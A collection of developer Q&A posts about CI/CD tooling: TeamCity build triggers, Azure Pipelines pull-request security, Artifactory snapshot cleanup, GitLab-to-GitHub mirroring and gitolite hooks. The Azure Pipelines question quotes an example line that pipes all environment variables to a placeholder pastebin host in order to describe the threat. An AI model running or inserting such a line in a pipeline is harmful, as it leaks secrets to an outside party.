Trigger TeamCity build when network folder changes

Can't seem to find this question asked anywhere... but I would like to trigger a TeamCity build when a network folder is updated. This is content for our installer, too big to put into GitHub, hence managed by a team internally.
Seems like the sort of thing someone would have written a plugin for, but I can't find one. Does anyone have a solution for this? Ideally I'd just point the trigger at a network folder and TeamCity would start a build whenever that folder gets updated.

Not sure if monitoring a network folder is a good, scalable solution; there are a couple of alternative approaches which might help in your case:
It seems you're already using TeamCity, maybe even building your installer in TeamCity, so you might make use of Snapshot or Artifact dependencies, or use a Finish Build trigger.
You could trigger a build in TeamCity via the REST API from the tool/script that uploads your installer to the remote folder, basically just by executing a POST request (an example curl request might look like curl http://teamcity-host/app/rest/buildQueue --request POST --user user:password -H "Content-Type:application/xml" -d "<build><buildType id='buildToTriggerId'/></build>"); see the corresponding REST API documentation.
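For instance, the upload script itself could queue the build right after copying the content. A minimal sketch, assuming hypothetical paths, credentials, and the build configuration ID buildToTriggerId:

#!/bin/sh
# Hypothetical upload script: copy the installer content, then queue a TeamCity build.
set -e

# Paths, credentials and the build configuration ID are assumptions.
cp -r ./installer-content/. /mnt/network-share/installer/

curl --request POST "http://teamcity-host/app/rest/buildQueue" \
  --user user:password \
  -H "Content-Type: application/xml" \
  -d "<build><buildType id='buildToTriggerId'/></build>"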
Update
Actually, there is a TeamCity plugin to monitor the content (changes) returned by a specified URL, file or directory, too: Url Build Trigger

Related

Run security checks before running Azure Pipelines CI on public PRs

I have a public repo. Random GitHub users are free to create pull requests, and this is great.
My CI pipeline is described in a normal file in the repo called pipelines.yml (we use Azure Pipelines).
Unfortunately this means that a random GitHub user is able to steal all my secret environment variables by creating a PR where they edit the pipelines.yml and add a bash script line with something like:
export | curl -XPOST 'http://pastebin-bla/xxxx'
Or run arbitrary code, in general. Right?
How can I verify that a malicious PR doesn't change at least some critical files?
I am afraid there is no built-in way to prevent a PR from changing certain critical files.
As a workaround, we could turn off automatic fork builds and instead use pull request comments as a way to manually build these contributions, which gives you an opportunity to review the code before triggering a build.
You can check the document Consider manually triggering fork builds for more details.
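For reference: with automatic fork builds turned off, a team member with write access can review the diff first and then queue the build by commenting /AzurePipelines run (or the shorthand /azp run) on the pull request.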

TeamCity API call to get a list of modifications to a build configuration

I'm running TeamCity Enterprise 2019.2.4 (build 72059).
Is there an easy API call to get the username of a person who disabled a build step?
If that is not possible, as I suspect, what's the API endpoint to get a list of all modifications for a build configuration, and then the endpoint to get the contents of that modification?
Mind you, this is not about VCS changes. I know how to get those.
I enabled versioned settings for that project, so I just check the git history for the file that represents the build configuration and parse the commits for the one that disabled the build step.
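Concretely, a minimal sketch of that history check, assuming the versioned settings are stored in Kotlin DSL format, where a disabled step typically appears as enabled = false (an assumption; the XML settings format differs):

# Find commits that added or removed "enabled = false" anywhere in the
# settings, and show who made them (hash, author, date, subject).
git log -S "enabled = false" --format='%h %an %ad %s' -- .teamcity/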

JFrog Artifactory: How to delete old snapshot artifacts

I had a task to delete old SNAPSHOT artefacts which live under many folders/directories.
We can't go and delete each and every artefact manually, so I would like to go with the REST API.
For clarity, some example paths:
https://artifactory.com/artifactory/maven-local/com/aa/bbb/cccc/dddd/XYZ-SNAPSHOT/abc.jar
https://artifactory.com/artifactory/maven-local/com/aa/bbb/cccc/dddd/XYZ-SNAPSHOT/xyz.jar
https://artifactory.com/artifactory/maven-local/com/aa/bbb/cccc/eeee/XYZ-SNAPSHOT/pqr.jar
https://artifactory.com/artifactory/maven-local/com/aa/bbb/dddd/eeee/XYZ-SNAPSHOT/lmn.jar
The four examples above are in different directories.
My script needs to go into each and every directory and check for XYZ-SNAPSHOT; if it is found, we can build a URL and delete it through curl.
How can we achieve this? Or is there any other way to do it?
You probably want to use Artifactory Query Language (AQL), which is the easiest way to find artifacts and modules according to patterns; you can find a bunch of examples on that page. Moreover, to perform the deletion easily and even automate the process in the future, I advise using JFrog CLI. You can also read this interesting blog about a similar use case.
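A minimal sketch of the AQL route, assuming hypothetical credentials, a 30-day age cutoff, and that jq is available to parse the response:

#!/bin/sh
# Hypothetical sketch: find XYZ-SNAPSHOT items older than 30 days via AQL,
# then delete each one through the REST API.
AUTH="user:password"
BASE="https://artifactory.com/artifactory"

curl -s -u "$AUTH" -X POST "$BASE/api/search/aql" \
  -H "Content-Type: text/plain" \
  -d 'items.find({"repo":"maven-local","path":{"$match":"*XYZ-SNAPSHOT*"},"created":{"$before":"30d"}})' |
jq -r '.results[] | "\(.repo)/\(.path)/\(.name)"' |
while read -r item; do
  curl -s -u "$AUTH" -X DELETE "$BASE/$item"
done

With JFrog CLI, the same AQL query can go into a file spec for jfrog rt del, which also supports a --dry-run flag for a safe first pass.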
Also, there is the 'Max Unique Snapshots' field in your local Maven repository settings; you can use that to have Artifactory keep only a specified number of unique snapshots per artifact.

How to push from Gitlab to Github with webhooks

My Google-fu is failing me for what seems obvious if I can only find the right manual.
I have a GitLab server which was installed by our hosting provider.
The GitLab server has many projects.
For some of these projects, I want GitLab to automatically push to a remote repository (in this case GitHub) every time there is a push from a local client to GitLab.
Like this: client --> gitlab --> github
Any tags and branches should also be pushed.
AFAICT I have 3 options:
Configure the local client with two remotes, and push simultaneously to GitLab and GitHub (see the sketch after this list). I want to avoid this because developers.
Add a git post-receive hook in the repository on the Gitlab server. This would be most flexible (I have sufficient Linux experience to write shell scripts as git hooks) and I have found documentation on how to do this, but I want to avoid this too because then the hosting provider will need to give me shell access.
I use webhooks in GitLab. I am unfamiliar with even the very basics of webhooks, and I am unable to locate understandable documentation or even a simple step-by-step example. This is the documentation from GitLab that I found, and I do not understand it: http://demo.gitlab.com/help/web_hooks/web_hooks
I would appreciate good pointers, and I will summarize and document a solution when I find it.
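For completeness, option 1 would look something like this on each developer's machine (repository URLs are hypothetical):

git remote set-url --add --push origin git@gitlab.example.com:group/project.git
git remote set-url --add --push origin git@github.com:org/project.git
# Both URLs must be added: once any push URL is set, the fetch URL is no
# longer used for pushing. A single "git push origin" then sends to both.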
EDIT
I'm using this Ruby code for a web hook:
require 'sinatra/base'
require 'json'

# Minimal GitLab webhook receiver; run it e.g. via a config.ru
# containing: require './pew'; run PewPewPew
class PewPewPew < Sinatra::Base
  post '/pew' do
    push = JSON.parse(request.body.read)
    puts "I got some JSON: #{push.inspect}"
  end
end
Next: find out how to tell the gitlab server that it has to push a repository. I am going back to the GitLab API.
EDIT
I think I have an idea. On the server where I run the webhook, I pull from GitLab and then I push to GitHub. I can even do some "magic" (running tests, building jars, deploying to Artifactory, ...) before I push to GitHub. In fact it would be great if Jenkins were able to push to a remote repository after a successful build; then I wouldn't need to write my own webhook, because I'm pretty sure Jenkins already provides a webhook for GitLab, either natively or via a plugin. But I don't know. Yet.
EDIT
I solved it in Jenkins.
You can set more than one git remote in a Jenkins job. I used Git Publisher as a Post-Build Action and it worked like a charm, exactly what I wanted.
Option 1 would work, of course.
Option 2 is possible but dangerous, because GitLab Shell automatically symlinks hooks into repositories for you, and those are necessary for permission checks: https://github.com/gitlabhq/gitlab-shell/tree/823aba63e444afa2f45477819770fec3cb5f0159/hooks so I'd rather stay away from it.
Option 3, web hooks, is not directly suitable: they make an HTTP request with a fixed format on certain events, in your case push; they are not Git protocol requests.
Of course, you could write a server that consumes the hook, clones and pushes, but a service (single push and no deployment) or GitLab CI (already implements hook management) would be strictly better solutions.
Services would be the best option if someone implemented one: they live in the source tree, would do a single push, and require no extra deployment overhead.
GitLab CI, or other CIs like Jenkins, are the best option currently available. They are essentially already-implemented servers for the webhooks, which automatically clone for you: all you have to do then is push from them (see the sketch below).
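A minimal sketch of that clone-and-push step inside a CI job, assuming hypothetical repository URLs and that the job has push credentials for GitHub; --mirror carries all branches and tags, which matches the requirement above:

# Hypothetical CI step: mirror all refs from GitLab to GitHub.
git clone --mirror git@gitlab.example.com:group/project.git
cd project.git
git push --mirror git@github.com:org/project.git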
The keywords you want to Google for are "gitlab mirror github". That has led me to Gitlab repository mirroring, for instance. There seems to be no perfect, easy solution today.
Also, this has already been proposed on the feature request forum: http://feedback.gitlab.com/forums/176466-general/suggestions/4614663-automatic-push-to-remote-mirror-repo-after-push-to Always check there ;) Go and upvote the request.
The key difficulty now is how to store the push credentials.
As noted in the edit above, I solved it in Jenkins, using Git Publisher as a Post-Build Action.
I added "-publisher" jobs that run after "" is built successfully. I could have done it in one job, but I decided to split it up. The build jobs are triggered by a web hook in GitLab; the publisher jobs use a #daily schedule from the BuildResultTrigger plugin.

Making gitolite trigger TeamCity builds

Rather than having TeamCity log onto the gitolite server several tens of thousands of times each day, and sitting around waiting for the poll to happen (or starting it manually),
it would be nice if it were possible to set up gitolite hooks that inform TeamCity that the repository has changed.
Is such a configuration possible with TeamCity and gitolite?
I know Jenkins has a github plugin that works nicely - I use that setup for some Minecraft CI I am running privately.
One way would be to get gitolite (through a VREF hook) to call TeamCity through its REST API, in order to launch a build via a web request.
You just need to make a web request to the following URL:
http://YOURSERVER/httpAuth/action.html?add2Queue=btId
where btId is the build type ID – a unique identifier for each build configuration.
To get it, you can just look for it in the browser address bar when clicking on a build configuration, or use the TeamCity REST API for details.
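In practice the request needs HTTP authentication, so from a script it would look something like this (credentials and btId are placeholders):

curl -u user:password "http://YOURSERVER/httpAuth/action.html?add2Queue=btId"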
The OP Morten Nilsen didn't need a VREF:
add a file "post-receive" to .gitolite/hooks/common and
run gitolite setup --hooks-only
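A minimal sketch of such a hook (server URL, credentials and btId are placeholders, as above):

#!/bin/sh
# .gitolite/hooks/common/post-receive
# Queue a TeamCity build whenever a push is received.
curl -s -u user:password \
  "http://YOURSERVER/httpAuth/action.html?add2Queue=btId" > /dev/null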
